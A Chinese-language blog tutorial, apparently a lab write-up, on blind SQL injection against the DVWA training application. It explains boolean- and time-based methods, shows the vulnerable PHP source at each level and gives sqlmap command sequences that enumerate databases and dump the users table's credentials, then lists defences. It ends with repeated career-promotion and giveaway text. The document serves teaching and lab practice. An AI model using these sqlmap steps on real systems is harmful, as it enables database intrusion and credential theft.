SQL Injection (Blind)盲注
一、SQL盲注概述
在SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。
在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:
基于布尔的盲注(Boolean based)
基于时间的盲注(Time based)
1.1 基于布尔的盲注
某些场合下,页面返回的结果只有两种(正常或错误)。通过构造SQL判断语句,查看页 面的返回结果(True or
False)来判断哪些SQL判断条件成立,通过此来获取数据库中的 数据。
1.2 基于时间的盲注
又称延时注入,即使用具有延时功能的函数sleep、benchmark等,通过判断这些函数是否正常执行来获取数据库中的数据。
1.3 SQL盲注常用函数
if()
功能:条件判断。
语法格式:if(expr1,expr2,expr3):expr1
为true则返回expr2,expr1为false则返回 expr3。
注: 仅MySQL支持if(expr1,expr2,expr3)。
length()
功能:返回字符串的长度,以字节为单位。
语法格式:length(str)
substr()、substring()
功能:从指定的位置开始,截取字符串指定长度的子串。
语法格式:substr(str,pos)或substr(str,pos,len),substring(str,pos)或substring(str,pos,len)
参数说明
lstr:要提取子串的字符串。
lpos:提取子串的开始位置。
len:指定要提取的子串的长度
ascii()、ord()
功能:返回字符串最左边字符的ASCII码值。
语法格式:ascii(str),ord(str)
延时函数sleep()
功能:让语句延迟执行一段时间,执行成功后返回0。
语法格式:sleep(N),即延迟执行N秒。
二、SQL盲注测试
实验环境:DVWA
2.1 DVWA-LOW级别下的sql盲注
第一步:分析源码
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
$exists = false;
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors
$exists = false;
if ($result !== false) {
try {
$exists = (mysqli_num_rows( $result ) > 0);
} catch(Exception $e) {
$exists = false;
}
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
break;
case SQLITE:
global $sqlite_db_connection;
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
try {
$results = $sqlite_db_connection->query($query);
$row = $results->fetchArray();
$exists = $row !== false;
} catch(Exception $e) {
$exists = false;
}
break;
}
if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
} else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
?>
由源码可以看到未对参数进行任何检查、过滤,只是回显的时候被隐藏,存在明显sql注入漏洞,返回结果只有两种,user id exiets in the
database和user id is missing from the database。
第二步:获取url和cookie
启动Burpsuite,在SQL injection(Blind)中输入如下,然后查看Burpsuite中抓到的URL和Cookie。
第三步:进行sqlmap
sqlmap –u
“http://192.168.1.9/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#”
–cookie=” PHPSESSID=c70fedb980dad8412a65b6d7; security=low” --batch
发现有两个类型的注入漏洞,一个是基于布尔的,一个是基于时间的
第四步:遍历数据库
sqlmap –u
“http://192.168.1.9/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#”
–cookie=” PHPSESSID=c70fedb980dad8412a65b6d7; security=low” --batch --dbs
第五步:指定数据库获取表名
sqlmap -u
“http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#”
–cookie=“PHPSESSID=c70fedb980dad8412a65b6d7; security=low” --batch -D dvwa
–tables
第六步:获取表里属性的信息
sqlmap -u
“http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#”
–cookie=“PHPSESSID=c70fedb980dad8412a65b6d7; security=low” --batch -D dvwa -T
users --columns
第七步:查看user和password的内容并解密
sqlmap -u
“http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#”
–cookie=“PHPSESSID=c70fedb980dad8412a65b6d7; security=low” --batch -D dvwa -T
users --dump
sqlmap -u
“http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#”
–cookie=“PHPSESSID=c70fedb980dad8412a65b6d7; security=low” --batch -D dvwa -T
users -C user,password -dump
2.2 DVWA-Medium级别下的sql盲注
第一步:分析源码
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$exists = false;
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors
$exists = false;
if ($result !== false) {
try {
$exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
} catch(Exception $e) {
$exists = false;
}
}
break;
case SQLITE:
global $sqlite_db_connection;
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
try {
$results = $sqlite_db_connection->query($query);
$row = $results->fetchArray();
$exists = $row !== false;
} catch(Exception $e) {
$exists = false;
}
break;
}
if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
} else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
?>
只能进行选择,所以使用BurpSuite进行拦截,在数据包中修改id值,然后在Response中的Render下查看结果。
第二步:获取url和cookie
Cookie: PHPSESSID=c70fedb980dad8412a65b6d7; security=medium
第三步:进行sqlmap
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/#”
–cookie=“PHPSESSID=c70fedb980dad8412a65b6d7; security=medium”
–data=“id=1&Submit=Submit” --batch
注入类型为post,一个是基于布尔的,一个是基于时间的
第四步:遍历数据库
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/#”
–cookie=“PHPSESSID=c70fedb980dad8412a65b6d7; security=medium”
–data=“id=1&Submit=Submit” --batch --dbs
第五步:指定数据库获取表名
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/#”
–cookie=“PHPSESSID=c70fedb980dad8412a65b6d7; security=medium”
–data=“id=1&Submit=Submit” --batch -D dvwa --tables
第六步:获取表里属性的信息
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/#”
–cookie=“PHPSESSID=c70fedb980dad8412a65b6d7; security=medium”
–data=“id=1&Submit=Submit” --batch -D dvwa -T users --columns
第七步:查看user和password的内容并解密
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/#”
–cookie=“PHPSESSID=c70fedb980dad8412a65b6d7; security=medium”
–data=“id=1&Submit=Submit” --batch -D dvwa -T users -C user,password -dump
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/#”
–cookie=“PHPSESSID=c70fedb980dad8412a65b6d7; security=medium”
–data=“id=1&Submit=Submit” --batch -D dvwa -T users --dump
2.3 DVWA-high级别下的sql盲注
第一步:分析源码
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
$exists = false;
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors
$exists = false;
if ($result !== false) {
// Get results
try {
$exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
} catch(Exception $e) {
$exists = false;
}
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
break;
case SQLITE:
global $sqlite_db_connection;
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
try {
$results = $sqlite_db_connection->query($query);
$row = $results->fetchArray();
$exists = $row !== false;
} catch(Exception $e) {
$exists = false;
}
break;
}
if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
?>
限制了输出行数为一行,而且失败时 当他随机生成的数等于3就会随机休眠2-4秒,目的是干扰基于时间的盲注
第二步:获取url和cookie
第三步:进行sqlmap
–second-order 当web程序输入与返回不在一处界面时,使用此参数监控另一处页面
构造函数:
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/” --cookie=“id=1;
PHPSESSID=c70fedb980dad8412a65b6d7; security=high” --data=“id=1&Submit=Submit”
–batch
第四步:遍历数据库
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/” --cookie=“id=1;
PHPSESSID=c70fedb980dad8412a65b6d7; security=high” --data=“id=1&Submit=Submit”
–batch --dbs
第五步:指定数据库获取表名
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/” --cookie=“id=1;
PHPSESSID=c70fedb980dad8412a65b6d7; security=high” --data=“id=1&Submit=Submit”
–batch -D dvwa --tables
第六步:获取表里属性的信息
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/” --cookie=“id=1;
PHPSESSID=c70fedb980dad8412a65b6d7; security=high” --data=“id=1&Submit=Submit”
–batch -D dvwa -T users --columns
第七步:查看user和password的内容并解密
做到这里我发现从一开始就错了,一个非常低级简单的简单的错误:我的url选错了,而且high等级有两个窗口,请求窗口和响应窗口,查询数据提交的页面、查询结果显示的页面是分离成了2个不同的窗口分别控制的。即在查询提交窗口提交数据(POST请求)之后,需要到另外一个窗口进行查看结果(GET请求)。
我们还需要引入一个知识点–second-order(二阶sql注入)
构造函数:
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/cookie-input.php”
–data=“id=1&Submit=Submit” --second-url
“http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/” --cookie=“id=1;
PHPSESSID=c70fedb980dad8412a65b6d7; security=high” --batch
第四步:遍历数据库
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/cookie-input.php”
–data=“id=1&Submit=Submit” --second-url
“http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/” --cookie=“id=1;
PHPSESSID=c70fedb980dad8412a65b6d7; security=high” --batch --dbs
第五步:指定数据库获取表名
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/cookie-input.php”
–data=“id=1&Submit=Submit” --second-url
“http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/” --cookie=“id=1;
PHPSESSID=c70fedb980dad8412a65b6d7; security=high” --batch -D dvwa --tables
第六步:获取表里属性的信息
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/cookie-input.php”
–data=“id=1&Submit=Submit” --second-url
“http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/” --cookie=“id=1;
PHPSESSID=c70fedb980dad8412a65b6d7; security=high” --batch -D dvwa -T users
–columns
第七步:查看user和password的内容并解密
sqlmap -u “http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/cookie-input.php”
–data=“id=1&Submit=Submit” --second-url
“http://10.0.2.15/DVWA/vulnerabilities/sqli_blind/” --cookie=“id=1;
PHPSESSID=c70fedb980dad8412a65b6d7; security=high” --batch -D dvwa -T users -C
user,password --dump
到这里就注入成功了!
2.4 DVWA-Impossible级别下的sql盲注
impossible.php代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入
只有当返回的查询结果数量为一个记录时,才会成功输出,这样就有效预防了暴库
利用is_numeric($id)函数来判断输入的id是否是数字or数字字符串,满足条件才知晓query查询语句
Anti-CSRF
token机制的加入了进一步提高了安全性,session_token是随机生成的动态值,每次向服务器请求,客户端都会携带最新从服务端已下发的session_token值向服务器请求作匹配验证,相互匹配才会验证通过
三、sql盲注的防御
与sql注入的防御方法一样,这里再写一遍
1.使用安全的API(应用程序编程接口)
2.过滤危险字符,例如采用正则表达式匹配union、sleep等关键字,如果匹配到,则退出程序。
3.对输入的特殊字符进行Escape转义处理
4.使用白名单来规范用户的输入,对客户端进行控制,不允许输入SQL注入相关的特殊字符
5.服务器端在提交数据之前进行SQL语句查询,对特殊字符进行过滤、转义、替换和删除等操作
6.使用PDO预编译语句,PDO技术就是将查询查询的语句和输入的参数分开,先将需要查询的语句进行预编译,然后再将参数传入进去,注意,不要将变量直接拼接到PDO语句中,而是使用占位符进行数据库的增删改查。(PDO预编译是防御SQL注入最好的方法)
题外话
初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:
2023届全国高校毕业生预计达到1158万人,就业形势严峻;
国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。
一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。
6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。
2022届大学毕业生月收入较高的前10个专业
本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。
具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。
网络安全行业特点
1、就业薪资非常高,涨薪快 2022年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!
2、人才缺口大,就业机会多
2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
324
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
